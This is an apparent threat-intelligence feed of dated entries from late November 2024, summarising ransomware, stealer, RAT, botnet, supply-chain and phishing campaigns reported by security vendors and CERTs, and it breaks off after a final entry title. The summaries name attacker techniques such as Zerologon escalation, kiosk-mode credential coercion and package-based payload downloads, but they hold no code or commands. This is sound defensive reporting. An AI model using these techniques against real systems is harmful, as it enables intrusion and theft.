Intel Source:
Securelist
Intel Name:
The_Examination_of_Elpaco_Ransomware
Date of Scan:
2024-11-26
Impact:
LOW
Summary:
Researchers at Securelist have examined a customized variant of the Mimic ransomware, identified as ElPaco. In a recent incident response case, it was found that the attackers gained access through Remote Desktop Protocol (RDP) via a brute-force attack and escalated their privileges by exploiting the CVE-2020-1472 (Zerologon) vulnerability. ElPaco uses the Everything library, which comes with a user-friendly graphical interface that allows attackers to tailor its functionality. The ransomware also includes features to disable security measures and run system commands.
Source: https://securelist.com/elpaco-ransomware-a-mimic-variant/114635/
2024-11-26
EDRBypass_Detection_Update
MEDIUM
Intel Source:
DETECT FYI
Intel Name:
EDRBypass_Detection_Update
Date of Scan:
2024-11-26
Impact:
MEDIUM
Summary:
Detection updates covering EDR killers such as EDR Silencer, EDRSandblast, Killer Ultra, Kill AV, and AVNeutralizer.
Source: https://detect.fyi/detection-opportunities-edr-silencer-edrsandblast-kill-av-d882c290a393
2024-11-26
APTC60_ThreatGroup
LOW
Intel Source:
JPCERT
Intel Name:
APTC60_ThreatGroup
Date of Scan:
2024-11-26
Impact:
LOW
Summary:
In August 2024, the APT-C-60 group launched targeted attacks against domestic organizations using spear-phishing emails that impersonated job applicants. These emails linked to a malicious Google Drive-hosted VHDX file, which contained malware designed to infect systems via legitimate tools and services, including git.exe, Bitbucket, and StatCounter. The malware leveraged sophisticated techniques such as COM hijacking and XOR encoding for persistence and stealth. It deployed backdoors, including SpyGrace v3.1.6, to exfiltrate data and execute commands.
Source: https://blogs.jpcert.or.jp/ja/2024/11/APT-C-60.html
2024-11-26
Xworm_Malware
LOW
Intel Source:
Seqrite
Intel Name:
Xworm_Malware
Date of Scan:
2024-11-26
Impact:
LOW
Summary:
XWorm is a stealthy malware known for its design and obfuscation techniques, which help it avoid detection. It communicates with its C2 server to carry out its malicious activity. After compromising a machine, it creates a unique mutex to ensure only one copy of itself runs at a time. It sends detailed information about the infected computer back to the attackers so they can monitor the system remotely and issue commands. Additionally, XWorm can change DNS settings, update itself, and erase traces from the system.
Source: https://www.seqrite.com/blog/evolving-threats-the-adaptive-design-of-xworm-malware/
2024-11-26
Strengthening_Defenses_Against_C2_Tactics
LOW
Intel Source:
Huntress
Intel Name:
Strengthening_Defenses_Against_C2_Tactics
Date of Scan:
2024-11-26
Impact:
LOW
Summary:
Researchers at Huntress have discovered a novel yet traceable tradecraft used by a threat actor for remote access and command-and-control infrastructure. This case shows the need to establish continual feedback loops between detection and hunting cycles, leaving no opportunity for persistent threats or backdoors to survive.
Source: https://www.huntress.com/blog/know-thy-enemy-a-novel-november-case-on-persistent-remote-access
2024-11-26
SMOKEDHAM_Backdoor
MEDIUM
Intel Source:
TRAC Labs
Intel Name:
SMOKEDHAM_Backdoor
Date of Scan:
2024-11-26
Impact:
MEDIUM
Summary:
The SMOKEDHAM backdoor, operational since 2019, is deployed by the financially driven threat group UNC2465, known for advanced extortion campaigns, including ransomware such as DARKSIDE and LOCKBIT. Using trojanized software installers spread via malvertising on platforms like Google and Bing Ads, UNC2465 gains initial access to victims’ systems. SMOKEDHAM facilitates persistence and reconnaissance, employing tools like BloodHound and RDP, with malware often delivered through phishing emails or supply chain attacks. A notable 2021 supply chain attack targeted a CCTV vendor's clients, while recent 2023 campaigns used malicious versions of legitimate software. UNC2465 also exploits Cloudflare Workers for domain fronting and advanced persistence techniques such as DLL side-loading and registry modifications.
Source: https://medium.com/trac-labs/who-ordered-the-smokedham-backdoor-delicacies-in-the-wild-87f51e2e5bd2
2024-11-26
Matrix_Launches_Large_Scale_DDoS_Campaign
LOW
Intel Source:
Aquasec
Intel Name:
Matrix_Launches_Large_Scale_DDoS_Campaign
Date of Scan:
2024-11-26
Impact:
LOW
Summary:
Aquasec researchers have uncovered a DDoS campaign conducted by a threat actor called Matrix. The attacker exploits weak credentials, misconfigurations, and vulnerabilities in internet-connected devices, particularly IoT devices and enterprise servers, to build a massive botnet capable of causing global disruption. They target devices such as routers, cameras, and telecom equipment, as well as software systems such as Hadoop and HugeGraph, using brute-force attacks and public scripts to gain access. The campaign focuses heavily on cloud service providers (CSPs) and organizations in China and Japan.
Source: https://www.aquasec.com/blog/matrix-unleashes-a-new-widespread-ddos-campaign/
2024-11-26
AutoIt_Credential_Flusher
LOW
Intel Source:
Open Analysis Research
Intel Name:
AutoIt_Credential_Flusher
Date of Scan:
2024-11-26
Impact:
LOW
Summary:
The Credential Flusher technique, observed since August 22, 2024, leverages AutoIt scripts to coerce victims into entering credentials into their browsers, which are later stolen using traditional stealer malware. This approach launches a browser in kiosk mode—locking it to a login page like Google—forcing victims to input credentials out of frustration. These credentials are stored in the browser’s credential store and subsequently exfiltrated by malware such as StealC. The Credential Flusher itself does not steal credentials but acts as a catalyst. It identifies available browsers, targets specific login pages, and is packaged into executable binaries for deployment.
Source: https://research.openanalysis.net/credflusher/kiosk/stealer/stealc/amadey/autoit/2024/09/11/cred-flusher.html
2024-11-26
Exploitation_of_PAN_OS_Vulnerabilities
LOW
Intel Source:
Arcticwolf
Intel Name:
Exploitation_of_PAN_OS_Vulnerabilities
Date of Scan:
2024-11-26
Impact:
LOW
Summary:
Researchers at Arctic Wolf have discovered several attacks targeting Palo Alto Networks firewall devices across a variety of businesses. Threat actors gained initial access by exploiting two recently published PAN-OS vulnerabilities, CVE-2024-0012 and CVE-2024-9474. These attacks involved malicious HTTP downloads of the Sliver C2 framework, coinminer binaries, and other payloads.
Source: https://arcticwolf.com/resources/blog-uk/threat-campaign-targeting-palo-alto-networks-firewall-devices/
2024-11-26
RomCom_Zero_Day_Exploitations
MEDIUM
Intel Source:
ESET Research
Intel Name:
RomCom_Zero_Day_Exploitations
Date of Scan:
2024-11-26
Impact:
MEDIUM
Summary:
ESET researchers uncovered a campaign by the Russia-aligned cybercrime and espionage group RomCom, exploiting two zero-day vulnerabilities in Mozilla products (CVE-2024-9680) and Windows (CVE-2024-49039). These critical flaws enabled attackers to execute code remotely and bypass Firefox’s sandbox protections, culminating in the delivery of the RomCom backdoor. The campaign utilized fake websites to redirect victims to exploit-hosting servers, deploying shellcode and privilege escalation techniques. Mozilla and Microsoft quickly patched the vulnerabilities in October and November 2024, respectively.
Source: https://www.welivesecurity.com/en/eset-research/romcom-exploits-firefox-and-windows-zero-days-in-the-wild/
2024-11-26
The_Return_of_ANEL_Backdoor
LOW
Intel Source:
Trend Micro
Intel Name:
The_Return_of_ANEL_Backdoor
Date of Scan:
2024-11-26
Impact:
LOW
Summary:
A new spear-phishing campaign, attributed to Earth Kasha, has been targeting individuals and organizations in Japan since June 2024. This campaign marks the return of the ANEL backdoor, previously used by APT10 until 2018, and the use of NOOPDOOR, associated with Earth Kasha. The campaign focuses on political organizations, research institutions, think tanks, and those involved in international relations, reflecting a shift in target from enterprises to individuals. Earth Kasha's tactics, techniques, and procedures (TTPs) have evolved, moving away from exploiting edge device vulnerabilities to spear-phishing, with a particular interest in Japan's national security and international relations.
Source: https://www.trendmicro.com/en_us/research/24/k/return-of-anel-in-the-recent-earth-kasha-spearphishing-campaign.html
2024-11-26
Perfctl_Malware_Targets_Linux_Servers
LOW
Intel Source:
SOC Radar
Intel Name:
Perfctl_Malware_Targets_Linux_Servers
Date of Scan:
2024-11-26
Impact:
LOW
Summary:
Perfctl is a sophisticated and stealthy malware targeting Linux servers, leveraging fileless infection techniques to evade traditional security defenses. It infiltrates systems by mimicking legitimate processes and using server resources for cryptocurrency mining and proxyjacking. The malware has primarily impacted industries like cryptocurrency platforms and software development, where high computational demand is common. Its ability to remain undetected while consuming valuable server resources makes it a significant threat, emphasizing the need for enhanced detection measures in Linux environments.
Source: https://socradar.io/perfctl-campaign-exploits-millions-of-linux-servers-for-crypto-mining-and-proxyjacking/
2024-11-26
VidarStealerUpdate
LOW
Intel Source:
LIA Insights
Intel Name:
VidarStealerUpdate
Date of Scan:
2024-11-26
Impact:
LOW
Summary:
Threat actors managing botnets often use unique identifiers to organize bots, distinguish campaigns, and assign administrative access, particularly in Malware-as-a-Service (MaaS) operations. Identifiers vary across malware families; for instance, SmokeLoader uses plaintext strings, Bokbot employs binary identifiers, and Vidar stealer uses unique hexadecimal build IDs linked to threat actor profiles. Vidar build IDs, which hinder researchers from grouping samples without backend access, can still reveal campaign patterns when historical tasking data is available. Recent tracking highlighted increased activity and automation in October, with two Vidar tasks yielding 131 unique payloads identified as Lumma Stealer. These tasks, also used by other botnets like StealC, suggest automation to evade detection.
Source: https://insights.loaderinsight.agency/posts/vidar-build-id-correlation/
2024-11-25
CyberVolk_Evolving_Hacktivist_Threat
LOW
Intel Source:
Sentinelone
Intel Name:
CyberVolk_Evolving_Hacktivist_Threat
Date of Scan:
2024-11-25
Impact:
LOW
Summary:
Researchers at SentinelLabs have discovered a pro-Russian hacktivist organization, CyberVolk, using ransomware attacks to take advantage of geopolitical tensions. The group promotes tools such as HexaLocker and Parano and exchanges codebases with AzzaSec and DoubleFace.
Source: https://www.sentinelone.com/labs/cybervolk-a-deep-dive-into-the-hacktivists-tools-and-ransomware-fueling-pro-russian-cyber-attacks/
2024-11-25
JinxLoader_to_Astolfo_Loader
LOW
Intel Source:
Blackberry
Intel Name:
JinxLoader_to_Astolfo_Loader
Date of Scan:
2024-11-25
Impact:
LOW
Summary:
Researchers at BlackBerry have uncovered a malware loader called JinxLoader, which has been active since 2023. It operates as a MaaS offering and is distributed through phishing emails to target Windows and Linux systems. JinxLoader is primarily designed to deploy other malware, such as Formbook and XLoader, and is managed through a central server panel. It often spreads via password-protected RAR files and HTML-based phishing lures that use JavaScript to deliver the malware. Additionally, Astolfo Loader, a version of JinxLoader rewritten in C++ for better performance and a smaller file size, works in a similar way.
Source: https://blogs.blackberry.com/en/2024/11/jinxloader-evolution
2024-11-25
New_Domains_of_INC_and_Lynx_Ransomware
LOW
Intel Source:
TheRavenFile
Intel Name:
New_Domains_of_INC_and_Lynx_Ransomware
Date of Scan:
2024-11-25
Impact:
LOW
Summary:
The INC Ransomware group, known for attacks on companies like Yamaha Motors Philippines, Xerox, and various healthcare sectors, has been using multiple DLS (Data Leak Sites) on the surface web to leak victim data. In May 2024, they offered their ransomware project for sale and rebranded as Lynx Ransomware in July 2024. Despite the rebranding, the original INC Ransomware DLS, with over 100 victims, remains active, alongside the new Lynx Ransomware DLS, which has 40 victims. New domains related to both ransomware variants are still in operation.
Source: https://github.com/TheRavenFile/IOC/blob/main/INC-Lynx%20Ransomware
2024-11-25
Obfuscated_Gh0st_Campaign_Targets_Chinese_Users
LOW
Intel Source:
Still / Azaka
Intel Name:
Obfuscated_Gh0st_Campaign_Targets_Chinese_Users
Date of Scan:
2024-11-25
Impact:
LOW
Summary:
The Obfuscated Gh0st campaign targets Chinese-speaking individuals through fake downloads of browsers, VPNs, and Telegram. It collects fingerprinting information, including screen dimensions, language, and website titles upon page load. Clicking anywhere on the page triggers a malicious download, leading to the installation of the GoegIesretp malware, which is placed under C:\Windows\svcorenos once elevated to a service. The malware uses DSClock as a launcher and decodes obfuscated shellcode via checkUpdater.cfg and the RtlDecompressBuffer function.
Source: https://github.com/Still34/malware-lab/tree/main/reworkshop/2024-11-24
2024-11-25
NPM_Supply_Chain_Attack
LOW
Intel Source:
Checkmarx
Intel Name:
NPM_Supply_Chain_Attack
Date of Scan:
2024-11-25
Impact:
LOW
Summary:
Researchers from Checkmarx have discovered a supply chain attack involving a malicious npm package. The package steals sensitive information such as SSH keys and command history every 12 hours while simultaneously mining cryptocurrency on infected systems. It sends the stolen data to Dropbox and file.io. The package spreads through two methods: direct installation from npm and as a hidden dependency in a GitHub project named “yawpp”, which pretends to be a WordPress tool. As of now, at least 68 systems have been compromised and are actively mining cryptocurrency for the attackers.
Source: https://checkmarx.com/blog/npm-supply-chain-attack-combines-crypto-mining-and-data-theft/
2024-11-25
Earth_Estries_Cyber_Espionage_Campaign
MEDIUM
Intel Source:
Trend Micro
Intel Name:
Earth_Estries_Cyber_Espionage_Campaign
Date of Scan:
2024-11-25
Impact:
MEDIUM
Summary:
Trend Micro researchers have uncovered a cyber espionage campaign operated by the Chinese advanced persistent threat (APT) group Earth Estries, also known as Salt Typhoon and FamousSparrow, which has been targeting critical industries such as telecommunications, government entities, consulting firms, and NGOs since 2023. Their primary focus is on regions including the US, Asia-Pacific, the Middle East, South Africa, and Southeast Asia. They use advanced techniques, exploiting server vulnerabilities such as Ivanti VPN flaws, Fortinet SQL injection, and Microsoft Exchange's ProxyLogon to gain initial access. After gaining access, they leverage legitimate tools for network traversal and deploy custom malware such as GHOSTSPIDER, SNAPPYBEE, and MASOL RAT to conduct long-term espionage against their targets.
Source: https://www.trendmicro.com/en_us/research/24/k/earth-estries.html
2024-11-25
Banking_Entity_Targeting_Via_PEC_Mailboxes
LOW
Intel Source:
CERT-AGID
Intel Name:
Banking_Entity_Targeting_Via_PEC_Mailboxes
Date of Scan:
2024-11-25
Impact:
LOW
Summary:
CERT-AGID researchers have uncovered a phishing campaign targeting customers of the Italian banking institution Intesa Sanpaolo. In this campaign, the attackers send emails from compromised Certified Electronic Mail (PEC) accounts to appear more legitimate. The emails warn users of an urgent need to update the device used for banking services to avoid losing access, and include a link that redirects the user to a fake banking login page. After entering their login credentials, victims are further tricked into providing their payment card details, handing the attackers sensitive financial information.
Source: https://cert-agid.gov.it/news/caselle-pec-sempre-piu-usate-nel-phishing-per-le-frodi-bancarie/
2024-11-25
Ursnif_Banking_Trojan
LOW
Intel Source:
Cyble
Intel Name:
Ursnif_Banking_Trojan
Date of Scan:
2024-11-25
Impact:
LOW
Summary:
Cyble researchers have discovered a phishing campaign targeting business professionals in the United States. The attacker uses an LNK file disguised as a PDF inside a ZIP archive that is typically delivered through spam emails to trick users. When the file is opened, it runs a command that executes a malicious HTA (HTML Application) file, which in turn activates a malicious DLL identified as the Ursnif banking trojan. The trojan connects to a remote server to download additional malware and steal sensitive information from the victim’s machine.
Source: https://cyble.com/blog/ursnif-trojan-hides-with-stealthy-tactics/
2024-11-22
Hexon_Stealer
LOW
Intel Source:
Cyfirma
Intel Name:
Hexon_Stealer
Date of Scan:
2024-11-22
Impact:
LOW
Summary:
Cyfirma researchers have identified a malware called Hexon Stealer that specializes in stealing sensitive data, including browser credentials, autofill information, credit card details, cryptocurrency wallet details, and Discord tokens. The malware was initially shared on the Telegram channel Hexon Stealer, but it is now being promoted under a new name, Hexon Grabber. It grants attackers full remote access to compromised systems, enabling screen monitoring, keyboard and mouse control, and even access to private chats.
Source: https://www.cyfirma.com/research/hexon-stealer-the-long-journey-of-copying-hiding-and-rebranding/
2024-11-22
Unveiling_APT_K_47_ThreatActor
MEDIUM
Intel Source:
Knownsec 404 team (Medium)
Intel Name:
Unveiling_APT_K_47_ThreatActor
Date of Scan:
2024-11-22
Impact:
MEDIUM
Summary:
Researchers at Knownsec have uncovered a campaign conducted by the threat actor APT-K-47, also known as Mysterious Elephant, which has been active since 2022 and is believed to originate from South Asia. The attacker uses a malicious CHM file disguised as content related to the religious event Hajj, which silently executes a malicious executable named Policy_Formulation_Committee.exe. The final payload employs asynchronous programming, similar to the known backdoor AsyncShell previously observed in APT-K-47’s campaigns. AsyncShell supports both cmd and PowerShell commands. APT-K-47 targets South Asian countries including Pakistan, Bangladesh, and Turkey, and focuses on religious events and geopolitical issues.
Source: https://medium.com/@knownsec404team/unveiling-the-past-and-present-of-apt-k-47-weapon-asyncshell-5a98f75c2d68
2024-11-22
XorBot_Botnet_Targets_IoT_Devices
LOW
Intel Source:
NSFOCUS
Intel Name:
XorBot_Botnet_Targets_IoT_Devices
Date of Scan:
2024-11-22
Impact:
LOW
Summary:
XorBot, a new and evolving botnet family, emerged in November 2023 and has since become a significant security threat, particularly targeting Internet of Things (IoT) devices such as Intelbras cameras and routers from TP-Link and D-Link. First disclosed by NSFOCUS researchers in December 2023, XorBot exhibits advanced anti-tracking capabilities and has undergone continuous updates, with the latest version being 1.04. As the botnet grows, its operators are also offering DDoS attack rental services. The botnet is sometimes referred to as Masjesu after its newly registered channel name.
Source: https://nsfocusglobal.com/alert-xorbot-comes-back-with-enhanced-tactics/
2024-11-22
SAFEPAY_Ransomware_Overview
LOW
Intel Source:
Linkedin
Intel Name:
SAFEPAY_Ransomware_Overview
Date of Scan:
2024-11-22
Impact:
LOW
Summary:
SAFEPAY ransomware emerged in late November 2024, although it had been active since August 2024. It primarily targets Windows systems and has impacted 25 victims, including organizations in the United States, Argentina, Belgium, Canada, and the United Kingdom. Industries affected include service, energy, grocery, healthcare, hospitality, IT, and retail, with some victims previously attacked by Meow and Black Suit ransomware. SAFEPAY uses ShareFinder.ps1 to gather network situational awareness on Windows domains and has been observed operating under the hostnames WIN-3IUUOFVTQAR and WIN-SBOE3CPNALE. The ransomware's data leaks are hosted on an onion site, with the attackers utilizing VULTR services for DLS hosting on the TOR network. The group appears to be a rapidly organized entity, using a leaked Conti/LockBit encryptor and choosing basic vanity onion addresses.
Source: https://www.linkedin.com/posts/rakesh-krishnan-6179a94b_infosec-safepay-ransomware-activity-7265607811256987648-TIt3/
2024-11-22
TAG110_Cyber_Espionage_Campaign
LOW
Intel Source:
Recorded Future
Intel Name:
TAG110_Cyber_Espionage_Campaign
Date of Scan:
2024-11-22
Impact:
LOW
Summary:
Researchers from Insikt Group have discovered an ongoing cyber-espionage campaign targeting organizations in Central Asia, East Asia, and Europe. This campaign is being carried out by the Russia-aligned threat group TAG110, which overlaps with UAC0063 and is linked with moderate confidence to the Russian APT group BlueDelta (APT28). The campaign, active since at least July 2024, has affected 62 victims in eleven nations, with a primary focus on government, human rights, and educational institutions.
Source: https://go.recordedfuture.com/hubfs/reports/CTA-RU-2024-1121.pdf
2024-11-22
DPRK_IT_Worker_Front_Companies_Exposed
LOW
Intel Source:
SentinelOne
Intel Name:
DPRK_IT_Worker_Front_Companies_Exposed
Date of Scan:
2024-11-22
Impact:
LOW
Summary:
Researchers from SentinelLabs have examined the distinctive characteristics of various websites belonging to DPRK IT worker front companies, which have since been seized by the US government. They concluded with high confidence that DPRK actors are impersonating US-based software and technology consultancy businesses by mimicking the websites of legitimate firms in order to achieve financial goals.
Source: https://www.sentinelone.com/labs/dprk-it-workers-a-network-of-active-front-companies-and-their-links-to-china/
2024-11-22
PyPI_Library_Targeting_Private_Keys
LOW
Intel Source:
Phylum
Intel Name:
PyPI_Library_Targeting_Private_Keys
Date of Scan:
2024-11-22
Impact:
LOW
Summary:
Researchers at Phylum have observed that the PyPI package aiocpa was upgraded with malicious code intended to steal private keys. When users initialize the crypto library, the code sends these keys to Telegram. Notably, the attacker avoided detection by keeping the package's GitHub repository free of malicious code.
Source: https://blog.phylum.io/python-crypto-library-updated-to-steal-private-keys/
2024-11-22
Supply_Chain_Attack_on_Lottie_Player
LOW
Intel Source:
Reversing Labs
Intel Name:
Supply_Chain_Attack_on_Lottie_Player
Date of Scan:
2024-11-22
Impact:
LOW
Summary:
Researchers from Reversing Labs have discovered a supply chain attack targeting the popular @lottiefiles/lottie-player package, showing the dangers of rogue packages infiltrating established codebases. This attack used hijacked maintainer accounts to publish malicious versions, potentially affecting many projects.
Source: https://www.reversinglabs.com/blog/differential-analysis-raises-red-flags-over-lottiefiles/lottie-player
2024-11-22
New_Suspicious_Certificates_Linked_to_DarkPeony_C2
LOW
Intel Source:
Hunt.IO
Intel Name:
New_Suspicious_Certificates_Linked_to_DarkPeony_C2
Date of Scan:
2024-11-22
Impact:
LOW
Summary:
Hunt.IO researchers have identified two additional suspicious SSL/TLS certificates on infrastructure previously linked to suspected PlugX C2 nodes, with recurring use of AES in the organizational unit field. These certificates are associated with domains likely involved in malware communication or downloads. This aligns with previous findings from NTT, which connected the same infrastructure to the DarkPeony threat group. The group's ongoing use of similar certificates and servers suggests a consistent operational tempo, allowing for continuous tracking of their activity.
Source: https://hunt.io/blog/darkpeony-certificate-patterns
2024-11-22
NPM_and_PyPI_Malicious_Campaign
MEDIUM
Intel Source:
Datadog
Intel Name:
NPM_and_PyPI_Malicious_Campaign
Date of Scan:
2024-11-22
Impact:
MEDIUM
Summary:
Datadog researchers have identified a supply chain attack targeting two major software repositories, PyPI and npm. The activity, tracked as MUT-8694, uses malicious packages to deliver infostealer malware to Windows users. The attackers leverage legitimate services such as GitHub and Repl.it to host and distribute additional malicious payloads. The PyPI package executes a PowerShell command to download an infostealer called Blank Grabber from GitHub. Researchers also identified 42 malicious PyPI packages linked to this activity, along with similar malicious npm packages such as nodelogic.
Source: https://securitylabs.datadoghq.com/articles/mut-8964-an-npm-and-pypi-malicious-campaign-targeting-windows-users/
2024-11-22
APT_C_36_Targets_Colombia_with_DcRat
MEDIUM
Intel Source:
360 Threat Intelligence Center
Intel Name:
APT_C_36_Targets_Colombia_with_DcRat
Date of Scan:
2024-11-22
Impact:
MEDIUM
Summary:
APT-C-36, also known as Blind Eagle, is a suspected South American cyber threat group primarily targeting Colombia, with some activity in Ecuador and Panama. Since its discovery in 2018, the group has focused on attacking government entities, financial sectors, insurance companies, and large corporations in Colombia. Recently, Blind Eagle has used UUE-compressed packages disguised as judicial documents to deliver the DcRat backdoor, compromising victims’ systems.
Source: https://mp.weixin.qq.com/s/DDCCjhBjUTa7Ia4Hggsa1A
2024-11-22
VenomRAT_vs_AsyncRAT
LOW
Intel Source:
Rapid7
Intel Name:
VenomRAT_vs_AsyncRAT
Date of Scan:
2024-11-22
Impact:
LOW
Summary:
Rapid7 researchers have observed that VenomRAT and AsyncRAT are very popular tools among cybercriminals because they allow attackers to take control of compromised machines for data theft, espionage, and continuous monitoring of victims. Both RATs are open source and are based on another tool called QuasarRAT, which explains their similarities. However, they have added different features and behaviours over time that set them apart from each other. Threat groups such as Blind Eagle (APT-C-36), Coral Rider, NullBulge, and OPERA1ER often use these RATs in their campaigns.
Source: https://www.rapid7.com/blog/post/2024/11/21/a-bag-of-rats-venomrat-vs-asyncrat/
2024-11-21
The_Dangerous_Blend_of_Phishing
LOW
Intel Source:
Cofense
Intel Name:
The_Dangerous_Blend_of_Phishing
Date of Scan:
2024-11-21
Impact:
LOW
Summary:
Cofense researchers have observed that online scams and phishing websites are targeting users to steal their government ID details and facial data. These scams often start with phishing emails claiming that a user needs to verify their identity to avoid losing access to an account. The email creates urgency and tricks users into clicking a link. Once the user clicks on the link, they are redirected to a CAPTCHA verification page, and after passing the CAPTCHA, the user is taken to another page that asks for personal documents such as passports or driving licenses. The final step involves a selfie check, where the user is asked to position their face in a circle and start a live recording.
Source: https://cofense.com/blog/the-dangerous-blend-of-phishing-for-government-ids-and-facial-recognition-video
2024-11-21
Persistence_Tactics_in_PUA_Threats
LOW
Intel Source:
LevelBlue
Intel Name:
Persistence_Tactics_in_PUA_Threats
Date of Scan:
2024-11-21
Impact:
LOW
Summary:
Researchers from LevelBlue have discovered a potentially unwanted application (PUA) that used two persistence techniques, Scheduled Task creation and Autorun registry keys, to execute malicious JavaScript disguised as a PDF utility. When first identified, it was removed once it was confirmed to be illegitimate. In a similar earlier case, past analysis helped replace an exclusion with a blocklist entry, highlighting the importance of monitoring and analysis in minimizing such threats.
Source: https://levelblue.com/blogs/security-essentials/stories-from-the-soc-registry-clues-to-pdf-blues-a-tale-of-pua-persistence
2024-11-21
Sad_Announcement_TechSupport_Scam
LOW
Intel Source:
Malwarebytes
Intel Name:
Sad_Announcement_TechSupport_Scam
Date of Scan:
2024-11-21
Impact:
LOW
Summary:
Researchers from Malwarebytes have discovered a new wave of tech support scams that rely on emotional manipulation via "Sad announcement" emails. These emails frequently appear to come from known contacts, with subject lines such as "Sad announcement: [Name]," and contain messages referencing shared memories or photographs to trick recipients into clicking malicious links.
Source: https://www.malwarebytes.com/blog/news/2024/11/sad-announcement-email-leads-to-tech-support-scam
2024-11-21
NodeStealer_Targets_Facebook_Ads_Manager
LOW
Intel Source:
Netskope
Intel Name:
NodeStealer_Targets_Facebook_Ads_Manager
Date of Scan:
2024-11-21
Impact:
LOW
Summary:
Researchers at Netskope have identified a Python-based malware called NodeStealer. This is an infostealer that collects sensitive information such as credentials stored in web browsers, browser cookies, and now credit card details. Its primary focus is targeting Facebook business accounts particularly those using Facebook Ads Manager to extract financial details such as advertising budgets. NodeStealer employs advanced techniques like Windows Restart Manager to unlock browser files, inserting junk code to evade detection, and utilizing batch scripts to execute Python scripts on the infected machine.
Source: https://www.netskope.com/blog/python-nodestealer-targets-facebook-ads-manager-with-new-techniques
2024-11-21
Rise_of_Lumma_Stealer_Threat
LOW
Intel Source:
Mcafee
Intel Name:
Rise_of_Lumma_Stealer_Threat
Date of Scan:
2024-11-21
Impact:
LOW
Summary:
Researchers from McAfee have discovered an increase in the Lumma Stealer, an information-stealing malware that is spreading through Telegram channels. Threat actors exploit the platform's popularity to avoid typical detection techniques, delivering malware to a large, unknowing audience.
Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/lumma-stealer-on-the-rise-how-telegram-channels-are-fueling-malware-proliferation/
2024-11-21
BianLian_Ransomware_Updates
MEDIUM
Intel Source:
CISA
Intel Name:
BianLian_Ransomware_Updates
Date of Scan:
2024-11-21
Impact:
MEDIUM
Summary:
A joint advisory has been issued by the FBI, CISA, and ASD’s ACSC regarding the activities and tactics of the BianLian ransomware group. The group has been active since 2022 and uses ransomware and data extortion techniques to target organizations worldwide. It has impacted multiple critical infrastructure sectors, including professional services and property development firms in the U.S. and Australia. Initially, BianLian used a double extortion model, but it has now shifted its focus to purely exfiltrating data and extorting victims without encrypting systems. The group gains access through stolen Remote Desktop Protocol (RDP) credentials and uses readily available tools and scripts for system discovery and credential harvesting. It exfiltrates stolen data via File Transfer Protocol (FTP), Rclone, and the Mega file-sharing service. Victims are pressured into paying through threats of severe financial, legal, and reputational damage.
Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-136a
2024-11-21
Threat_Actor_Targets_Telecom_and_Financial_Sectors
MEDIUM
Intel Source:
EclecticIQ
Intel Name:
Threat_Actor_Targets_Telecom_and_Financial_Sectors
Date of Scan:
2024-11-21
Impact:
MEDIUM
Summary:
Researchers from EclecticIQ have uncovered a phishing campaign targeting the telecommunications and financial sectors. The attackers leverage Google Docs to deliver phishing links that redirect victims to fake login pages hosted on Weebly, a legitimate website builder. They create telecom-themed fake login pages for companies such as AT&T, as well as pages for financial institutions, to target users in the U.S. and Canada. The attackers also use legitimate tracking tools such as Sentry.io and Datadog in their phishing campaign to monitor user activity. These tools collect details such as when a victim interacted with the phishing page, their IP address, and their location.
Source: https://blog.eclecticiq.com/financially-motivated-threat-actor-leveraged-google-docs-and-weebly-services-to-target-telecom-and-financial-sectors
2024-11-21
Unveiling_WolfsBane
MEDIUM
Intel Source:
ESET
Intel Name:
Unveiling_WolfsBane
Date of Scan:
2024-11-21
Impact:
MEDIUM
Summary:
ESET researchers have discovered two new Linux backdoors linked to the China-aligned Gelsemium APT group, which has been active since 2014. The backdoors are named WolfsBane and FireWood. WolfsBane is the Linux version of Gelsevirine, a known Windows backdoor used by Gelsemium. The second backdoor, FireWood, appears to be related to Project Wood, another malware family used by Gelsemium, although FireWood’s connection to the group is less certain. These tools are designed for cyberespionage, allowing the attackers to steal sensitive data, maintain persistent access to compromised systems, and execute commands. Additionally, researchers identified other malicious tools, including webshells for remote control, an SSH password stealer, and a privilege escalation utility.
Source: https://www.welivesecurity.com/en/eset-research/unveiling-wolfsbane-gelsemiums-linux-counterpart-to-gelsevirine/
2024-11-21
XenoRAT
LOW
Intel Source:
Hunt.IO
Intel Name:
XenoRAT
Date of Scan:
2024-11-21
Impact:
LOW
Summary:
Hunt.IO researchers have identified a new tactic of delivering a malware called XenoRAT. This is an open-source RAT which is known for targeting gamers. Cybercriminals often use fake software or phishing emails to deliver the malware but in this case they delivered it through an Excel XLL file called Payment_Details.xll. The file was created using a legitimate tool called Excel-DNA and protected with ConfuserEx, a popular obfuscation tool. The XLL file acted as a dropper, deploying XenoRAT and another remote access tool.
Source: https://hunt.io/blog/xenorat-excel-xll-confuserex-as-access-method
2024-11-20
Exploitation_of_Misconfigured_Servers
LOW
Intel Source:
Aquasec
Intel Name:
Exploitation_of_Misconfigured_Servers
Date of Scan:
2024-11-20
Impact:
LOW
Summary:
Aquasec researchers have discovered a new attack vector in which attackers exploit misconfigured JupyterLab and Jupyter Notebook servers to hijack environments for streaming sports events. The attackers take advantage of these vulnerable servers to gain control. After gaining access, they install the ffmpeg tool to capture and redirect live sports broadcasts to their own illegal servers. Additionally, the attacker could disrupt data operations, steal information, or access other critical systems.
Source: https://www.aquasec.com/blog/threat-actors-hijack-misconfigured-servers-for-live-sports-streaming/
2024-11-20
Potential_C2_Seeder_Queries_11192024
MEDIUM
Intel Source:
STR
Intel Name:
Potential_C2_Seeder_Queries_11192024
Date of Scan:
2024-11-20
Impact:
MEDIUM
Summary:
This research is part of Securonix Threat Labs - Threat Research Team
Source: https://github.com/str-int-repo/str-seeder-behavior-queries
2024-11-20
DarkPlum_Targeting_Japan_Through_AsyncRAT
MEDIUM
Intel Source:
NTT
Intel Name:
DarkPlum_Targeting_Japan_Through_AsyncRAT
Date of Scan:
2024-11-20
Impact:
MEDIUM
Summary:
NTT researchers have uncovered that the threat group called DarkPlum, also known as Kimsuky or APT43, has been targeting Japan since March 2024 using a customized variant of AsyncRAT, which is available on GitHub. AsyncRAT is capable of infecting devices, gathering information, and executing malicious plugins sent from a command-and-control (C&C) server. The attacker uses several plugins, such as RemoteDesktop, FileManager, and RemoteShell, in its AsyncRAT variants. The RemoteDesktop plugin enables screen capture, mouse control, and keyboard input. The FileManager plugin steals folder and drive information, manipulates files, and even downloads tools like 7zip. The RemoteShell plugin allows DarkPlum to open command prompts, execute commands, and terminate processes to explore and manipulate the victim's environment.
Source: https://polite-sea-077fba000.1.azurestaticapps.net/tech_blog/darkplum-asyncrat
2024-11-20
When_Guardians_Become_Predators
LOW
